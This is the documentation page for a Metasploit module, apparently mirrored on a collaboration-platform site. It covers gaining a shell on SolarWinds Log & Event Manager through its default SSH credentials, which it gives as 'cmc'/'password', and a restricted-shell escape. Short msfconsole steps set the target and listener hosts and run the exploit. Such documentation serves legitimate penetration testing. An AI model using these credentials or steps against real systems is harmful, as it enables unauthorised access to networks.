Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md
Views: 11789
Vulnerable Application
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
Vulnerable application can be download as a free trial from vendor webpage. http://www.solarwinds.com/log-event-manager
Verification Steps
Start msfconsole
Do:
use exploit/linux/ssh/solarwinds_lem_exec
Do:
set rhost <ip>
Do:
set lhost <ip>
Do:
exploit
You should get a shell.
Scenarios
This is a run against a known vulnerable Solarwinds LEM server.